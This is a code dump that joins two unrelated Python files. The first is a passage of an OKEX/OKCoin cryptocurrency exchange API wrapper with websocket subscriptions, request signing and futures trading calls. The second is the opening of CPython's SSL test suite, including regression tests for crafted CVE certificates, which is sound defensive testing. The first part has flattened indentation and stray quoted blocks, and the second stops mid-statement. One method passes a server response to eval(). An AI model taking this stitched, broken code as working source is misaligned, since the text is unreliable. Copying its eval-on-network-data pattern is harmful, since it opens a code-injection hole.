#----------------------------------------------------------------------
def sendDataRequest(self, channel):
"""发送数据请求"""
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
j = json.dumps(d)
print j
        # if the connection has been closed, drop the message silently
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def login(self):
params = {}
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
        # build the request
d = {}
d['event'] = 'login'
d['parameters'] = params
        # pack with json before sending
j = json.dumps(d)
        # return False if the connection has been closed
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
return False
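#----------------------------------------------------------------------
# A standalone sketch (not part of the original file) of the signing scheme
# implemented by OkexApi.generateSign above: sort parameters by key, join
# them with '&', append 'secret_key=<secret>', then take the upper-cased
# MD5 hex digest. The key and values used here are placeholders.
def _demo_sign(params, secretKey):
    l = ['%s=%s' %(key, params[key]) for key in sorted(params.keys())]
    l.append('secret_key=%s' %secretKey)
    return hashlib.md5('&'.join(l).encode('utf-8')).hexdigest().upper()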
########################################################################
class OkexSpotApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexSpotApi, self).__init__()
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货的Tick"""
channel = 'ok_sub_spot_%s_ticker' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth=0):
"""订阅现货的深度"""
channel = 'ok_sub_spot_%s_depth' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDeals(self, symbol):
channel = 'ok_sub_spot_%s_deals' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotKlines(self, symbol, period):
channel = 'ok_sub_spot_%s_kline_%s' %(symbol, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def spotTrade(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_orderinfo'
self.sendTradingRequest(channel, params)
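#----------------------------------------------------------------------
# Usage sketch (illustrative; the credentials below are placeholders):
# connect the spot websocket API defined above and subscribe to a ticker.
def _demo_spot_usage():
    api = OkexSpotApi()
    api.connect('YOUR_API_KEY', 'YOUR_SECRET_KEY', trace=False)
    api.subscribeSpotTicker('btc_usdt')
    return api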
########################################################################
class OkexFuturesApi(OkexApi):
"""期货交易接口
交割推送信息:
[{
"channel": "btc_forecast_price",
"timestamp":"1490341322021",
"data": "998.8"
}]
data(string): 预估交割价格
timestamp(string): 时间戳
无需订阅,交割前一小时自动返回
"""
#----------------------------------------------------------------------
def __init__(self, apikey, secretkey):
"""Constructor"""
super(OkexFuturesApi, self).__init__()
self.__url = OKEX_usd_CONTRACT_REST
self.__apikey = apikey
self.__secretkey = secretkey
#----------------------------------------------------------------------
    def subscribeFuturesTicker(self, symbol, contractType):
        """Subscribe to the futures ticker"""
        channel = 'ok_sub_futureusd_%s_ticker_%s' %(symbol, contractType)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesKline(self, symbol, contractType, period):
"""订阅期货K线"""
channel = 'ok_sub_futureusd_%s_kline_%s_%s' %(symbol, contractType, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesDepth(self, symbol, contractType, depth=0):
"""订阅期货深度"""
channel = 'ok_sub_futureusd_%s_depth_%s' %(symbol, contractType)
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
##----------------------------------------------------------------------
#def subscribeFuturesTrades(self, symbol, contractType):
# """订阅期货成交"""
# channel = 'ok_sub_futureusd_%s_trade_%s' %(symbol, contractType)
# self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesIndex(self, symbol):
"""订阅期货指数"""
channel = 'ok_sub_futureusd_%s_index' %symbol
self.sendDataRequest(channel)
'''
#----------------------------------------------------------------------
def futuresTrade(self, symbol, contractType, type_, price, amount, matchPrice='0', leverRate='10'):
"""期货委托"""
params = {}
params['symbol'] = str(symbol)
params['contract_type'] = str(contractType)
params['price'] = str(price)
params['amount'] = str(amount)
        params['type'] = type_              # 1: open long, 2: open short, 3: close long, 4: close short
        params['match_price'] = matchPrice  # use counterparty price: 0: no, 1: yes (price is ignored when 1)
params['lever_rate'] = leverRate
channel = 'ok_futureusd_trade'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresCancelOrder(self, symbol, orderid, contractType):
"""期货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
channel = 'ok_futureusd_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresUserInfo(self):
"""查询期货账户"""
channel = 'ok_futureusd_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def futuresOrderInfo(self, symbol, orderid, contractType, status, current_page, page_length=10):
"""查询期货委托"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
params['status'] = str(status)
params['current_page'] = str(current_page)
params['page_length'] = str(page_length)
channel = 'ok_futureusd_orderinfo'
self.sendTradingRequest(channel, params)
'''
''' #----------------------------------------------------------------------
def subscribeFuturesTrades( self):
channel = 'ok_sub_futureusd_trades'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturesUserInfo(self):
"""订阅期货账户信息"""
channel = 'ok_sub_futureusd_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def subscribeFuturesPositions(self):
"""订阅期货持仓信息"""
channel = 'ok_sub_futureusd_positions'
self.sendTradingRequest(channel, {})
'''
    # Helpers for accessing the OKCOIN futures REST API
    '''
    # OKCOIN futures ticker info
def future_ticker(self, symbol, contractType):
FUTURE_TICKER_RESOURCE = "/api/v1/future_ticker.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
            params += '&contract_type=' + contractType if params else 'contract_type=' + contractType
return httpGet(self.__url, FUTURE_TICKER_RESOURCE, params)
    # OKCoin futures market depth info
def future_depth(self, symbol, contractType, size):
FUTURE_DEPTH_RESOURCE = "/api/v1/future_depth.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
            params += '&contract_type=' + contractType if params else 'contract_type=' + contractType
if size:
params += '&size=' + size if params else 'size=' + size
return httpGet(self.__url, FUTURE_DEPTH_RESOURCE, params)
    # OKCoin futures trade records
def future_trades(self, symbol, contractType):
FUTURE_TRADES_RESOURCE = "/api/v1/future_trades.do"
params = ''
if symbol:
params += '&symbol=' + symbol if params else 'symbol=' + symbol
if contractType:
params += '&contract_type=' + contractType if params else 'contract_type=' + symbol
return httpGet(self.__url, FUTURE_TRADES_RESOURCE, params)
# OKCoin futures index
def future_index(self, symbol):
FUTURE_INDEX = "/api/v1/future_index.do"
params = ''
if symbol:
params = 'symbol=' + symbol
return httpGet(self.__url, FUTURE_INDEX, params)
'''
# Get the USD/CNY exchange rate
def exchange_rate(self):
EXCHANGE_RATE = "/api/v1/exchange_rate.do"
return httpGet(self.__url, EXCHANGE_RATE, '')
# Get the estimated delivery price
def future_estimated_price(self, symbol):
FUTURE_ESTIMATED_PRICE = "/api/v1/future_estimated_price.do"
params = ''
if symbol:
params = 'symbol=' + symbol
return httpGet(self.__url, FUTURE_ESTIMATED_PRICE, params)
# Futures cross-margin account info
def future_userinfo(self):
FUTURE_USERINFO = "/api/v1/future_userinfo.do?"
params = {}
params['api_key'] = self.__apikey
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_USERINFO, params)
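# buildMySign() is presumably defined elsewhere in this module. The OKCoin v1
# REST API signs a request by sorting the parameters by key, appending the
# secret key, and MD5-hashing the result. A minimal sketch of that scheme, for
# illustration only (build_my_sign_sketch is a hypothetical name, not the real helper):
# import hashlib
# def build_my_sign_sketch(params, secret_key):
#     query = '&'.join('%s=%s' % (k, params[k]) for k in sorted(params))
#     return hashlib.md5((query + '&secret_key=' + secret_key).encode('utf-8')).hexdigest().upper()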
# Futures cross-margin position info
def future_position(self, symbol, contractType):
try:
FUTURE_POSITION = "/api/v1/future_position.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType
}
params['sign'] = buildMySign(params, self.__secretkey)
result = httpPost(self.__url, FUTURE_POSITION, params)
# httpPost() returns a JSON string; rewrite the booleans so eval() can parse it
# (json.loads would be the safer choice for untrusted exchange data)
result = result.replace('true', '1')
result = result.replace('false', '0')
return eval(result)
except Exception as e:
print(e)
# Place a futures order
def future_trade(self, symbol, contractType, price='', amount='', tradeType='', matchPrice='', leverRate=''):
FUTURE_TRADE = "/api/v1/future_trade.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'amount': amount,
'type': tradeType,
'match_price': matchPrice,
'lever_rate': leverRate
}
if price:
params['price'] = price
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_TRADE, params)
# Place futures orders in batch
def future_batchTrade(self, symbol, contractType, orders_data, leverRate):
FUTURE_BATCH_TRADE = "/api/v1/future_batch_trade.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'orders_data': orders_data,
'lever_rate': leverRate
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_BATCH_TRADE, params)
# Cancel a futures order
def future_cancel(self, symbol, contractType, orderId):
FUTURE_CANCEL = "/api/v1/future_cancel.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'order_id': orderId
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_CANCEL, params)
# Get futures order info
def future_orderinfo(self, symbol, contractType, orderId, status, currentPage, pageLength):
FUTURE_ORDERINFO = "/api/v1/future_order_info.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'order_id': orderId,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_ORDERINFO, params)
# Futures fixed-margin (isolated) account info
def future_userinfo_4fix(self):
FUTURE_INFO_4FIX = "/api/v1/future_userinfo_4fix.do?"
params = {'api_key': self.__apikey}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_INFO_4FIX, params)
# Futures fixed-margin (isolated) position info
def future_position_4fix(self, symbol, contractType, type1):
FUTURE_POSITION_4FIX = "/api/v1/future_position_4fix.do?"
params = {
'api_key': self.__apikey,
'symbol': symbol,
'contract_type': contractType,
'type': type1
}
params['sign'] = buildMySign(params, self.__secretkey)
return httpPost(self.__url, FUTURE_POSITION_4FIX, params)
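# Example usage (sketch): the constructor lives earlier in this file, so the
# class name and argument order below are assumptions for illustration only:
# api = OKCoinFutureAPI('https://www.okcoin.com', 'your-api-key', 'your-secret-key')
# print(api.future_userinfo())                        # cross-margin account
# print(api.future_position('btc_usd', 'this_week'))  # cross-margin positions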
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
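# Typical use in the tests below (see e.g. test_refcycle and test_timeout):
#   ss = test_wrap_socket(socket.socket(socket.AF_INET))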
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', '[email protected]'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
